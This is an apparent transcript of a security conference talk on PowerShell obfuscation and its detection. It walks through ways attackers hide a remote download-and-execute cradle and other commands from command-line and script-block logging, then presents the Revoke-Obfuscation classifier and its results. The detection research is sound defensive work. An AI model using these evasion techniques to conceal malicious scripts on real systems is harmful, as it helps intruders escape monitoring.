>>And my name is Daniel Bohannon uh I’m a a consultant [inaudible] I’ve been doing instant response [mic quits working] been doing instant response consulting with Manidant for the past 2 years and uh actually recently switched over to a uh senior applied security research position. um so getting to do a lot of this stuff more which is really exciting I’m also the author of the Invoke-Obfuscation and Invoke-CradleCrafter um powershell obfuscation frameworks. >>Thanks, D Bo! [applause] Alright so to kind of just hit the stage here we’re gonna talk a little bit about a treatise on blue team follies. So as it stands today you know the the majority of people use just regular command line logging, they look for processes for example powershell launching with malicious encoded commands. What we’re gonna do is we’re gonna go down some of the depths of how that can be dangerous, especially when you’ve got some bad assumptions going on. What we’ll do here though, of course, you can’t get any of this intelligence unless you’ve got logging enabled. So for sure make sure that you’ve got command line logging enabled that’s 4688 you can also get it from Sysmon, and then also that you’ve you got the PowerShell scriptblock loggings enabled because powershell version 5 has brought in tons and tons of awesome security stuff and uh attackers aren’t in the habit of enabling this stuff for you, so if you care about it you might as well do it first. So let's talk about what people do when they’re actually trying to do a sort of detection sort of based on malicious powershell. So you’ll see here maybe they’re gonna look at whenever I see powershell dash command I’m gonna take a look at those encoded arguments and try to figure out and write some detections based on those. Well powershell help, much like everything else is the best in the business. Turns out that you don’t only have to use direct input to the powershell dash command. You can also send in the those commands through standard input like many other automation tools you’re used to. So here’s an example of using this technique if you do this, if I’m taking some powershell commands and I’m dumping them in through powershell standard input if all you’re looking at is the content in the powershell command lines you’re gonna miss the stuff that went in there. However we’re a little bit ok so this is what it looks like when you look at the 8th command line logs for powershell itself. You don’t see the actual command that was run, I have one little note here this little blue shield this is stuff that will still show up in your powershell logs so while this won't show up in the 4688 this will show up in the powershell logs. However that looks like it’s kind of bad but what you do see here is if you look at the parent process command line the cmd itself you’ll see that somebody was trying to jack a bunch of input into powershell and so maybe you might start thinking about doing some detections based on that. So here’s a question do we start to maybe key anytime that cmd is calling powershell, that might be useful. But here's the thing, cmd you can also declare in an environment variable what process it should call. So here’s an example of setting powershell as chunks of two environment variables and then having cmd call that. So you can do all kinds of obfuscation with environment variables so just doing detections based on cmd that way, you’re at some kind of risk there for sure. This is an example from FIN8 a financially motivated attacker, doing a bunch of this stuff here with an embedded in a VB script VBA ring a bell? Yes, absolutely that’s what you just saw. They’re using late bound command piping into powershell to get their stuff done to avoid this command line detection. But you don’t only have to send things in through standard input, here’s an example at the bottom here of just using an environment variable directly in having powershell invoke the content of that environment variable. Kovter uses this as well so if you’re only looking at powershell command line that means you’re kind of screwed. Where will the clipboard? Here’s a good example of just using the clipboard as a information passing mechanism. You do see these things in the command lines but this is start starting to get really really really tough. So you might say here what happens if we just start applying detection for whenever a cmd is calling powershell maybe what I’ll do is I’m going to start doing detections based on that process chain, that’s the kind of thing that you see a lot of times in hids and that kind of thing. But here’s the thing when I run this sort of launch technique and dump anything into into powershell, what if an apparent cmd I set an environment variable I tell uh a child cmd to run the thing that was in the environment variable and that thing is the thing that actually calls powershell so if you’re doing anything that was just cmd calling powershell yeah you’re gonna miss that so this would be kinda cool if that works. Nah not quite, nearly but unfortunately we’re not gonna get there. However with the magic of cmd escaping all I need to do is escape that one last pipeline so that that initial cmd stops interpreting it. There we go! Yeah! Cmd that second cmd you can’t tell what it’s doing and then finally somehow powershell is getting involved. So obviously what we’re gonna do here is recursively check all the way up this parent process tree, combine all of those command line arguments, get rid of all that obfuscation and figure it out, like that’s the natural thing we’re gonna do and then we’re gonna save the day and be good. Unfortunately not, there is a ton of ways to give input to powershell that do not involve any source of parent process chain. What if you set, for example, you launch one window and set the commands in the window title, launch another window to scrape that window title as a kind of a sibling. You can use files, you can use reg keys, any sort of information passing mechanism that you can imagine that’s not just environment variables that’s gonna blow through any sort of parent process tree detection. So the good news as we kind of mentioned back there was the scriptblock logging and powershell will catch all these shenanigans but if you’re in an environment where the defenders are only looking at the command line logs you’re done. However there’s another thing we’ve just been talking about at this point we’ve just been talking about looking at process command chains. We haven’t even talked a little bit about the powershell content itself and it weighs through that. >>Yes, let's uh let's look at this content, itself so again we’ll see you’re really um on top of things you’re looking at all process command lines you’re also taking into account powershell scriptblock logging um are there any pitfalls that we might need to be aware of as defenders and are there any uh tools that you can use as redquimer to evade any evasion that you’re going up against. So we’re going to take a quick example uh a very rapid fire example looking at what we call the remote download cradle. Now the top here this remote download cradle is basically uh it’s copy and pasted everywhere it’s in all the major frameworks that you can think of attackers love this stuff it’s a one liner that will remotely - it will download a remote script in memory and then pass it to that invoke expression or iex which is basically like powershell’s eval statement if you will. So what what let’s play a little red team, blue team here we have our attacker command on the top this remote download cradle and as a defender, if we if we what if we say okay I’m interested when I see invoke-expression new object system dot net dot webclient and download stream http would this catch this command? Um it it will catch that command right here but lets lets go through a little obfuscation exercise and see what pitfalls are out there. So first whatever we see system dot that’s really not necessary in powershell. Um powershell will automatically pre pin that system dot for the dot net um h class so if an attacker doesn't have to have it in their command then as a defender uh we definitely don’t want to make that assumption in our um in our trigger terms down here so we’re gonna remove that from both. Um next, the URL this is uh this is the string so you can do stuff like I don’t know [inaudible] you’re also not to double quotes you can use single quotes you can put whitespace there you can also set it as a variable elsewhere there’s a lot of things you can do here so we’re just gonna remove that http part from the download string portion of the detection. So let’s keep going, download string. Um so download string is actually one of many methods in the net dot web client class and it’s the most common one that we see attacker's using but it’s definitely not the only one. This is just part of the list download string, download file, download data returning in obviously different formats, um an expression, a file on disk, download data is bitarray, um so maybe as a defender we say okay let’s just shorten it to dot download and make sure that we capture all these options up here. So that’s what we’ll do. Um also uh this parenthese isn’t really necessary we can start to chop up this powershell command and set pieces of it in variables so for example from frameworks out there will will say new object net dot web client let me put that in a variable typically called wc for web client, and then you just have variable name dot download string so let's remove that parentheses from the dot downloand portion of the trigger. So now from a powershell perspective um why why would this dot be problematic? Why how could an attacker get around that dot download to evade this detection that we have um well download string from a powershell token perspective um is actually a a member um and so somethings that we can do with member tokens in a powershell command so we can just throw single quotes around it we can also throw double quotes around it and if you look really closely at download string I promise this next slide works, but what we can do is just add a tick mark and that still runs now why the tick mark? What is this? Well the tick mark is the escape character or the grave accent character I like to think of it as a grave of a lot of grave defensive ideas I thought were really good ended up that they get broken by this. So we can actually put these uh in front of any character that has no escapable meaning um and you see the the 8 characters here um again like ‘0 is null ‘n for new line that sort of thing but as long as we place the ‘ before something that’s not one of those characters then we’re good. If you’re like me and you’re really OCD and you really wanna put a ‘ in front of those characters all you have to do just uppercase them and it totally works so now we can put tics in front of any character that we want in the method as long as we have double quotes, now here’s the scary part is that those tics are in the command line logs if you have some real time agent they’re in the command line uh the argument details itself and they actually persist all the way into powershell script block logs, now uh the place where uh this obfuscation doesn’t have any effect is in powershell module logs so the 4303 uh or 4103 EID so powershell’s log is really really robust um sometimes you just have to look in a lot of different places but all the all the evidence is there. So as a defender we can try to RegEx all this stuff to catch all these tic marks or maybe we should just give up on this, I don’t know, if you’re really brave and wanna do a RegEx make sure you keep in mind this open read method um which will return as a byte stream instead of a byte array or an expression um however I wouldn’t recommend doing a regex because if you throw parentheses around this you can then treat it as a legit string and start to do concatenations, set a chunk of variables, reverse to do whatever you want. Um and this dot invoke that you’ll see in these two examples that’s only required for powershell 2, um it’s not required for powershell 3 or later so as a defender if you look at invoke obfuscation it uses that dot invoke to make it um work on powershell 2 or later but you actually don’t have to have that, so make sure as a defender you’re not basing your defenses on that dot invoke portion. So let's just remove that uh from our indicators. So net dot web client, really briefly this is um from a powershell token perspective it’s an argument the new object command let we can do double quote tic marks we can put parentheses and catenate it, chunk it in variables, tons of options we’ll just go with the first one. There we go. New object now powershell is super inviting um to newcomers to learn the language because there is so many aliases so for example if you wanna list the files in the directory you can use powershell’s get shells atom if you’re lazy you can just say GCI or if you come from a windows background you can type der if you from a lenox background you can type ls and it all works so as a defender we have to be really careful to make sure that we’re understanding the the all the options that are available in powershell just from a pure syntax perspective regardless of any kind of obfuscation the nice thing is that new object has 0 aliases so initially I thought hey this is gonna be a really solid indicator as a defender, however uh powershell uh is really good at helping you find stuff that you know is out there but you can’t remember the name of so for example, if I’m looking for a command that’s new dash p something, I can just type get command new dash p wildcard and it will return in power shell objects all the commands. So, if I return just a single object, then I can actually pass to invoke expression, um and that will automatically convert that command name to a string and then invoke it. However, uh as an attacker, we could be a little more creative than this. Instead of that invoke expression, why don’t we use a dot or an ampersand? And what are these guys? They’re invocation operators, and when this happens, it’s actually taking the powershell object return from get command and invoking it. However, we can get even more fun. So, remember those wild cards? That is new object, as is that, and as many combinations as you can think of, as long as that get command is returning just new object, that suckers gonna run and as a defender you’re not seeing new object anywhere in command line or in script block logging, pretty crazy right? Actually, doesn’t stop there cause get command has an alias of GCM and it also has, if you promise not to tell anyone there’s actually an undocumented um alias here for get command and that is command, because powershell again, it’s like it’s your best friend, it’s really, really helpful, it doesn’t want to make you look silly, so if you just type command, it’s just gonna check hey is there a get dash command? There is? Solid, that’s what you were looking for and that works. So, anytime you’re running defenses based on get dash something, make sure you don’t count on that get dash being there because it absolutely doesn’t have to be. Um, in addition, forget command if you don’t wanna use wildcards you can set the command lm into uh variables like this, powershell 1 dot oh syntax. If you’re a defender and you’re not looking for this automatic variable of execution context, you absolutely want to be because it is really, really awesome. And, if you’re a red teamer, you definitely want to check this out. Here’s just a couple of ways, you can basically call get command or some of its similar counterparts using this 1 dot oh syntax. In addition to all the get command stuff we just said, you can do the exact same thing with get alias, GAL, or get alias’ alias which is called alias. Uh you can use that against the alias name instead of the commandlet name. So, there’s a lot going on there, why don’t we just choose this GCM w dash o example, right there. Um, so, it’s getting a little crazy, um, in addition to all these things, we can throw tic marks in front of them because they’re a commandlet and that’s something that’s available there. Um, you could also just use the indication operators against the string new object, and can catenate it or use what’s called a dash f format operator to literally reverse or not reverse, to literally reorder um the substrings that you just chalked up, so some people well, I’ll just remove all special characters from command uh from event logs and that new, new object can catenate it if I remove the quotes and remove the pluses,the new object will come back together. However, that’s not foolproof because these reordering techniques, you’ll never see that string new object come back together. So we can try to regex all the things, or just give up. So, I’m wanna be a realist here and just go ahead and pass on this one. So, we’re left with invoke expression, which is a freaking awesome indicator, especially on the command line. IE turn invoke expression, you definitely want to be looking at this. What are some things we need to keep in mind with that? Well, uh it has an alias of IEX which is typically what you see. Um, the ordering doesn’t matter, you can say invoke expression expression, or pipe an expression into invoke expression. You can throw tick marks because it's a commandlet, uh you can use the invocation operators and use catenation reordering. Um and fun fact, um in part of our research we’ll talk about here in just a second, we assembled a massive powershell corpus uh just a lot of scripts, we’ll get into the numbers in a second. But, basically only 3 percent of the scripts actually contained IEX or invoke expression, pretty interesting. But, one thing we have to keep in mind is that invoke expression has a cousin that is called invoke command which is quite interesting. So, invoke expression is expecting an expression and invoke command expects a script block, and typically it’s used to run a command on a remote system, but if you never specify a computer name for that remote system it runs locally. So what does that mean from a defenders perspective? Well, with invoke command, we have the alias of ICM the dot and ampersand indication operators also work, and then you have things, you have methods like dot invoke, invoke return as is, invoke with context, uh etcetera. A lot of options there, but typically you’ll see script blocks in curly places like we see here. Um, in addition powershell 1 dot oh syntax, there’s that execution context thing I was telling you about earlier right? Um, it has an invoke script method which can handle both expression and script blocks. So, let’s add in tick marks to all of these because there commandlets, but how in the world as a defender can we start keying off of an ampersand or a dot? That seems like it’s uh really be bound for false positives. So what if we say okay I’m only interested if there’s a dot or ampersand and there’s also a curly braces because curly braces are the only way you can denote a script block in powershell. If only it were that simple. Because, you can convert an expression to a script block, and here’s two examples of that using the script block class and create method or again execution context powershell 1 dot oh syntax for the new script block method, and you can obfuscate all of these just like we’ve been doing all along. So, every single layer can be obfuscated to the extreme and it sticks, the obfuscation is there and the command line arguments and also inscript lock logs. Um, in uh invoke cradle crafter a tool I released a couple of months ago- >>Thanks, D-Bo >>hahah, sorry Lee, um, I have to deal with it myself actually so we’re in the same boat there. Um, but uh it actually has over 10 different indication options, so there’s a lot of cool stuff there. >>[sigh] that is brutal, can you imagine trying to defend against that? God. Well, now that you’re done with that let’s [phew] that’s brutal >>yeah, fortunately, that’s really the extent of what you can do with powershell obfuscation. Nah, I’m totally kidding, there’s way more. [laughter][applause] What if we just take that. So, after all of that what if we then say hey totally screwed up, f’d up uh powershell command, why don’t we make you a string and then just reverse you on the command line and be reversed in memory. Here’s some examples of that. Um,we can also put garbage delimiters in the command and then split, basically split and join removing those. We can use replace uh methods to basically remove and replace those garbage delimiters. We can do any kind of decatenation that we want. Um and wouldn’t suck if there’s a tool out there that did all this by default. [laughter] Horrible, horrible ha. So, uh anyways, invoke obfuscation may or may not do that. So let’s take the same uh download credit we started with, and instead of going through this I don’t know 10 minute example of all these different things, we can literally at the click of a button say yeah just randomly obfuscate all the tokens in there, produce something like this. You could then say, if you’re really twisted, let me take this and then do some string obfuscation like that reordering right there. Fun fact, I spent a lot of time recently decoding this stuff because APT32 uh a nice uh Vietnamese uh APT group also known as OceanLotus happens to like this combo quite a bit. They’ll do one layer of string token all and then they’ll do like literally 5 or 6 layers of this string stuff. So, uh, I’v, I’ve gotten a lot of practice Lee, um- >>You make your bed you lay in it man >>I’m telling you man, I’m telling you. Um, invoke cradle craft or how might obfuscation with this look different. Um, in invoke cradle- >>Thanks D-Bo >>[laughter] Invoke cradle crafter actually doesn’t use any tick marks, um it will use uh substitutions, uh it will basically say instead of if we have download string instead of catenating it or using tick marks, let me actually enumerate all the methods available to new object net that web client and maybe like the 37th uh one actually half resolves to the string download string and so it using all that kind of substitution there. So, wouldn’t it be terrible if there was actually new and worse obfuscation techniques that just hit the market like three days ago. >>Thanks D-Bo >>[laughter] Sorry, uh I’ve been sitting on this one for like 6 months so I’ve gotta get it out there, what if it’s all special characters? [laughter] [applause] Now, I-I have to say up front, kudos, this was not my original idea, uh um a Japanese security researcher back in twenty ten wrote hello world using this technique entirely in special characters named uh mutaguchi so props to them, this is really, really freakin cool. Um, but all these, it’s basically just alot of different variables, definitely really interesting to read his blog post of how he came up with this, um those variable names could also just be different amounts of white space. [laughter] And then I was chatting with Casie Smith, our sub tee and he said oh well that looks kind of similar to like white space encoding. And I said, say what? He said, yeah, you know whitespace tab encoding. And I was like, that sounds amazing, let's do that right now, so that’s the second one I released [laughter]. So, the entire command is either white spaces and tab delimited or its tabs and whitespace delimited and they have this nice little stub decoder at the end. Um so, that that’s out there now. And this is pretty much what defenders feel like right? [laughter] an, and I am a defender, this is my job to come up against this stuff but uh, >>as you can tell he’s a noted blue teamer. >>hahaha [laughter] >>you're a masochist >>[laughter] So, uh, I feel really bad now, I feel a guilt trip, like is there anything we can do for defenders out there? >>I guess not, we’re uh, hold on, we’re just getting into this presentation, I think there’s some stuff we can do. So you might think, hey like, how in the world as a defender looking at your logs are you EVER going to find any of that stuff? Hands up, you're kind of screwed. So, we decided to dabble a little bit. We’re not data scientists, nothing like that, we just decided to play around a little bit. Here’s a core point though, you don’t need to detect all the stuff in there. All you need to know is that it exists. All of us looking, we take a look at that, and it’s obvious that that’s not normal stuff at all. What, what attackers are using as this amazing cloak of invisibility, we can do some smart stuff and turn that into like a shining laser. If you see stuff like this in your networks, your screwed, you should take a look, you don’t need to have the logging tools or the rajaxes telling you what it’s doing, just apply a bit of wet ware and you’re going to be in good shape. Now, how can we do that thought? That sounds simple. One of the cool things you could do is simple character frequencies. So, as we were talking about the uh big powershell corpus we made, so here’s an example in the right hand side where we did some character frequency analysis against all of the scripts in posh code which is a popular powershell script sharing repository. It looks kind of like English if you’ve ever done any simple crypto or anything, you kind of recognize those character frequencies. On the left hand side, you see some of the obfuscated values of the scripts that we just showed. Very, very, very clearly different right? You’ve got a bunch of backticks and square brackets, this really, really stands out. So the question is, like okay, yeah it’s a list of numbers, how am I supposed to figure out how similar those list of numbers are? There’s a tool out there! There’s a whole community in the world called information retrieval, and they do things like search engines, where they’ll go off and analyze things like web pages and documents, and they’ll figure out different features and different numbers, and then what they’ll do is they’ll compare those big lists of numbers together, to find lists of numbers that are similar. So, we’re used to this from high school and stuff and graph paper, you’ve got two numbers that represent a line, another two numbers that represent another line, and then the angle between those is the cosine and then you could do some little math here on the right, it makes us look smart so we’ve got it up there and I’m pretty proud of that, um so you could do some comparison on that, those lines to figure out how similar they are using the cosine. Turns out that the information retrieval guys like to do this for more than two numbers, so more than two dimensions, more than three dimensions, maybe like a thousand or two thousand dimensions. And at that point you’re talking about kind of like the angle between a three thousand dimensional line. I’m having a hard time picturing it, but it’s possible, it gives you a number. So, here’s an example of actually running that. You don’t need to read all of the powershell, it’s just powershell, but, what you can see here is we’ve got a huge grouping near the top, most of these things have a a very similar cosine similarity. But then you also have these obfuscated ones are sticking right out, 0 point 157, 0 point 379, this is an atomic bomb. Take a look at the average similarity among all of posh code, there’s a massive grouping up here. If you take a look at everything below 0 point 8 and then we did, these things are almost all obfuscated. And when they weren’t intentionally obfuscated, there were things like a code golf competition, where you know people just do garbage anyways. So, if we could somehow automate this cosine similarity, like problem solved. Run this on your logs, run this on your network and you’re good to go. >>So, these data points are generated again from all the scripts on posh code which is what 3 point 4 thousand I believe, uh so we really wanted more data and microsoft has been thinking about this for a while and so even looking last spring, they ran a little contest called underhanded powershell where they uh invited the red team community to basically submit uh obfuscated and underhanded powershell commands to perform a very specific task, that got around uh the certain script analyzer um detection rules that were in place. Um, so that was kind of neat. Um and then on top of that data there’s a lot of powershell script out there in the community that we wanted to gather. Um, we created a ginormous powershell corpus. >>ginormous >>but, since we’re both gentleman, we did it politely. Now, what do I mean by that? Well, this is a code that Lee wrote to actually scrape github for example, and if you’ll see those little blue portions, that’s the code that actually downloads the script. And, all those red portions, are blatant Canadian, cause Lee is Canadian and it’s very polite, throttling, ah it’s so nice, so kind. So, anyways, we politely scraped. Um, actually fun fact here, you were scraping for quite a while on github. >>Yeah, mad props to github. So, we took a look at all the repositories, and figured it would take about you know a month, so we, there was like 11 million repositories to scrape through, [clears throat] started going through a month straight just downloading, downloading, throttle; downloading, downloading, throttle. A month later it’s like, look at my repository index, 12 million, 13 million, doesn’t make sense. Go off and look again and I was off by order of magnitude, a hundred million repositories, and I was like we’ve got something to do man, we can’t be rescheduling this to December. So, the we reached out to the github guys, they went, zipped it all up, did a little bit of a back down, back end query, sent us a zip of all the powershells, so mad props to them. >>yeah, big thanks to them. Uh, the really big thanks though is to all of the contributors out there. So, if you wouldn’t mind raising your hand if you’ve ever contributed a powershell script, a posh code, technet, powershell gallery, github, github gifs are there any contributors in the house? Awesome, please give yourself a round of applause because you made this research possible [applause]. So, when you assemble a very large corpus of powershell scripts, you're impelled, compelled to look at them, and it’s very interesting when you start to look at all these scripts. >>I will never be the same man- >>hahaha, so some of the stuff we found was uh honestly, just really sad. Remove games dot ps1, um the author, oh wow, looks like it actually says Matt Graeber, I don’t know if that’s right, but basically it goes through and kills any running game processes and then, to top it off actually removes the directory, so I don’t know where the high scores are kept there, but that’s pretty cold though, kind of a buz-- >>depraved depraved man >>mmm, but no in all seriousness though, actually in this process, we did come across some that were, that were uh a bit more serious actually we came across one plot to overthrow some really interesting people and power and um that was this down with SOPA script. Let’s fill the US and senate servers with the message that we don’t want SOPA, uh stop online piracy act tends >>resist >>yes, so a lot of fun stuff in the corpus. So uh getting a little more serious, there’s a lot of scripts here. Uh 408,000 powershell scripts, to be exact over 28,000 authors, um actually identified roughly 1600 obfuscated scripts, uh um in this data set and then we generated about 4,000 obfuscated scripts using uh things like invoke expression or uh sorry, invoke obfuscation, invoke cradle crafter and ISE steroids. Um, the important thing here is that uh we actually, manually looked at and manually labeled around 7,000 scripts. >>Whoa >>That, that sounds pretty tedious, why would we do that Lee? >>People, people think that uh, hacking is amazing and fast paced, but it’s not. It’s a notepad window popping up, you closing it and saying “that wasn’t obfuscated.” Notepad window pops up, you close it and that was, and you get a big spreadsheet, so mad hacking skills. But here’s the thing, why do we do all of that? Remember I showed this a little bit ago? The, the similarity and how it kind of nailed it on the stuff below 0 point 8, Ryan Ka did a pretty good analysis afterwards kind of doing uh I think real scientific method of can we produce these results, does it show uh the kind of obfuscated stuff they were talking about. And they did find that hey you do have a, a kind of a balance between that that magical number 0 point 8, false positives, false negatives. So, mathematically, this is what it looks like. When you run that algorithm against the powershell corpus and all of this labeled data so you know we, I showed you back there, two obfuscated scripts. But, what if you know for a fact whether 7,000 powershell scripts are obfuscated or not? So then you can start to get some really, really good numbers, so the way that the uh information retrieval and data science community talks about this stuff, there's two main metrics here, one is precision and one is recall. So, prision-precision says, any time the tool says that something is obfuscated, how often is it correct? So, in that situation that was 89 percent. So, all of those things below 0 point 8, yeah, you’re pretty good, 90 percent effective at getting obfuscated powershell. Recall though, that’s where it takes a dive, what we didn’t analyze was all the stuff above 0 point 8. Turns out that was hiding a lot of stuff that later you would consider obfuscated, and that’s reflected in kind of a merged score that people talk about is the F1 score, just kind of averages the precision and recall. So, some super powerful stuff, unobfuscated but it's really got some opportunity here. This is powershell though, the most powerful scripting language known to man, we have the power, we can do better. >>So, instead of just looking at the character frequency of an entire script, um powershell if you think about any uh any language, it has to basically interpret and see what am I actually looking at? So, this is an example here of uh powershell tokenizing the command. Um and so basically you can see get command is a generic token, the dash name is a parameter token uh may the format operator string etcetera. Um, however, what we have at our fingertips is not just the tokenization that powershell can provide, but it’s also a tree. And this is called the abstract syntax tree, or AST. And not only does this identify all the tokens, it actually identifies the relationship with, with those tokens in the entire script so now you can see okay there’s a format operator buy what’s on its left, what’s on its right? What kind of, how many objects are there? And so this allows us to get a lot of interesting um features, now if you want to easily view this um there’s this awesome gooey, this uh AST powershell explorer, which you can actually get uh um it’s hosted on the powershell gallery, so you can literally just type in install module show psast and start running this right away, it’s a really, really nice gooey interface to explore, AST. Type in any command on the right, check out the AST. Now, why do we do this? Well with the AST we can get extremely granular, so for example we can say let me just group the number of all the different AST types. So maybe this one script is 33 percent string and that’s all it is, or maybe 99 percent of the script is a massive array. We do things like looking at array size ranges, again if we have a 5,000 element array, maybe that’s shellcode in there. I, I don’t know that’s pretty large. Uh also we can do things like look at language operators, so looking at assignment operators, binary, unary operators, invocation operators. And then for every single component that we did that grouping on, add in an additional layer of feature extraction, basically saying okay for all of these types, lets then do character frequency analys-analysis just on these types. So, for example, all commandlets in one group, all strings, all methods, all members and we’ll do things like looking at character frequency, entropy, whitespace density, the length, the maximum, minimum, median, mode, range and average length on top of that. And then also the percentage of character casing, you look for randomization and character casing. So, it actually produces quite a bit of features- >>5,000 that's kind of rough, I don’t know >>yeah, it is, what do we do with 5,000 features? >>That is a bad realization when you’ve got 5,000 features you know you’ve got stuff in there that’s awesome, what do you do with it? So, there’s a common method out there, to uh kind of classify data, it’s called a linear regression, that’s kind of the example there in the back, and the left hand side, so what you do is you kind of have a big math equation and if, if the number is above a certain boundary then that’s obfuscated and then if it’s below then it’s not. Now, the thing is these the AST features we were talking about, they really let you figure out a bunch of the techniques about obfuscation itself, and not just simple metrics. But, they kind of end up being rangy so like some of them end up being really large and really small, and so what you do is put them through a logit function and that basically scales them between zero and one. So, all those features that we extract now get scaled down to between 0 and 1, you combine that, and that is what is called a logistic regression. That’s a really, really, common thing, so for example, excel let’s you do a lot of these things as well. So you have all, all of the features so F1, F2, F3, and every them have a weight, so I’m gonna add up a feature times what the weight is going to be and another feature times what that weight is going to be, big, big, big, 5,000 of these things. And if that result was greater than what we consider a limit, then that’s, hey that’s obfuscated otherwise it’s not. But here’s the big issue, like I kind of dodged the question, what do I do about 5,000 features? Chris, back there in the car saw 5,000 features, he didn’t know what to do, this is what you’ve got to do. This is called a gradient descent and the idea being that you don’t necessarily ask D-Bo, like hey D-Bo, how important do you think a square bracket is and he’s like oh that’s an oh point 2, like I know an oh point 2 when I see one. But what you don’t know there is what’s that going to do to your false positives and everything else, so what you’ll do with the gradient descent, remember we had all that labelled data. What we can start with is 5,000 weights, and then just run a simulation and see how good they are with classifying and if you run a simulation and you're way off what you can do is feedback that error back into all of those weights. So, if you had a large weight, it’s going to get adjusted very appropriately, more significantly than small weights and if you don’t make a mistake well then those weights don’t get adjusted. And over thousands and thousands of times, this is kind of just automated statistics, over thousands and thousands of times, you end up optimizing yourself towards a an algorithm that’s really good based on what you measure. So here’s the question, like, you felt kind of like a pit of despair when you saw all that stuff, all that obfuscation and everything. Now when you start taking this logistic regression and gradient descent, you know you might be happy if that F1 score, remember we were down at like 57 percent, wouldn’t it be nice if we could get to like 60, 70 percent? How about 95? [applause] Using, revoke obfuscation, you can detect 94 percent of in the wild obfuscated powershell, with only 1 percent false positives, that is literally 10 times better than cosine similarity, with half the false positives. And, we can even do better, what about like that was in the, in the wild, obfuscated powershell and those kind of tend to be like everything to the wall obfuscate all the things, but what if you start some stuff that just feels kind of sketchy right? Where it’s like you know on that left you see that there’s massive, massive obfuscation, yeah absolutely like yeah that's an easy target, but this example on the right that’s not really obfuscated, it’s just kind of using unusual powershell, it’s this big uh, select object with a bunch of hash tables, like that’s a little bit out there, what could you do if you started applying revoke obfuscation to just mildly sketchy stuff, you know this is an example of you’re in an incident response or your suspicious you want to kind of widen the net a little bit. On sketchy still, it’s really really great. It’s able to return 89 percent of all sketchy stuff, so you’re 88 percent of all sketchy stuff with very very low false positives. But what’s even cooler is that, that bucket now, when you start talking about in the wild obfuscated powershell, it goes from 97 percent recall, so revoke obfuscation all by itself, 97 percent or 94 percent of in the wild powershell, obfuscated powershell, bringing it now to 97 percent, of in the wild obfuscated powershell. Super crazy this is a nuclear bomb against anybody trying to use obfuscated powershell in an engagement, a blue teamer or a defender, this thing has got to be in your arsenal. So logistic regression and gradient descent, that’s not the only thing out there, there’s other cats in the game, there’s boosted decision trees, there’s port vector models and all that kind of stuff. So, one of the cool things that we got out of doing all of this, so this was a hand implemented algorithm, in c sharp based on some cool stuff shared by James Mccaffrey on msdm for example. Uh, we compared it, we just had a big csv of all this stuff and you can actually do it, like upload it to as your machine learning and see how this thing performs in other algorithms. So, [clears throat] revoke obfuscation had very, very, basically, uh equivalent functionality to this same function implemented in a commercial machine learning system, but then you can apply to others and you know the next closest one was the boosted decision trees and those things had about the same accuracy, and two of the other algorithms that we messed around with had much less. So, what we’ve baked into revoke obfuscation is a really really top end model for you. >>would anyone like to see a demo? >>yeah [applause] >>yeah [applause] >>So, I’d like to think that revoke obfuscation is a really clean a pure commandlet approach, a lot of the tools I write have ASCII art like this, um so- >>console gooeys for the win >>ha, ha [applause] so actually what we’ll do here is the first one is me getting out all of my ASCII art in a completely separate function, that basically performs a nice little analysis here of the script at the top pulling out different features or attributes just to kind of show some of the levels of the stuff we’re doing here again 5,000 features on the average less than 300 milliseconds for extracting the features and measuring it um and here’s just a menu, this is completely for fun, and for lulls, there's stuff like uh a tutorial, if you like a colored version of the readme, basically that’s what it is. Uh, there’s a lot of fun facts, again, a lot of interesting stuff that we saw um in um some that we’re ashamed of, that we saw in the corpus there but anyways we felt like yeah we should be open and transparent so you can look at fun facts and see some stuff there, um you see a lot of really interesting ASCII art when your going through all these scripts, so, randomly see some ASCII art, uh and actually show you the project that it came from. Uh got some set of fun quotes and also some credits again, if you’ve ever contributed any powershell, um to get however other sources, like your name is actually in this code and if you run that enough, then you will see it. So, onto the stuff that you know actually does stuff, um, most people don’t have you know a huge uh you know directory with every single powerscript they’ve run in their environment to analyze here. Um, in revoke obfuscation we’ll handle both command lines and scripts um and so we’re trying to make this as operationally friendly and easy to implement as possible, so let’s say um that you just want to query your event logs using get winevent, sim sweep, I mean you just want to clog the raw ebtx files, that’s totally fine because we wrote a function called get rvo script block. Um rvo standing for revoke obfuscation, it will basically ex um ex, uh extract all of the uh script blocks and actually reassemble the script block that fall across multiple script block uh entries there. Um, so basically what’s really nice it you want to uh start with event logs, what you can do is say let me get all these event logs, let me pipe you in to get rvo script block, um let me retrieve all of the scripts from that, and then we can pipe it in to measure rvo obfuscation and there it is churning through them. >>Thanks D-Bo >>ha, ha, [applause] and as you can see, it caught our fun example of all special characters there, with a nice obfuscated as true and as you can see, all the script features are there and everything. The amount of time it took to extract the features, the measurement, uh and, and all that stuff, um so, the very last thing I’ll say here, is that again our, our desire is not just for this to be uh something uh that is used in research, but we want to make it accessible to any organization, we want people to be able to take this and literally run it like, like within minutes. Um and so to help facilitate that we actually have this hosted uh on on this github right here, it’s also hosted in the powershell gallery which literally gets you fire up powershell and run install module, revoke obfuscation, and it’s there, it’s locked, loaded, ready to go. And uh, and the one last thing I’ll say, is again, to make it operationally friendly, we’ve added several different options for white listing, so again if you start to set this up in an operational since in your environment, if you start to see uh these scripts come in that are flagged as obfuscated you can quickly look through and say oh no this is actually good, let me just drag this into the whitelist folder, maybe you can also content um string whitelisting, regiqua-, regex whitelisting etcetera, again, we want this to be as accessible and easy to use in an operational sense as possible for any defender out there. And that, is our talk. [applause] >>thank you >>thank you [applause]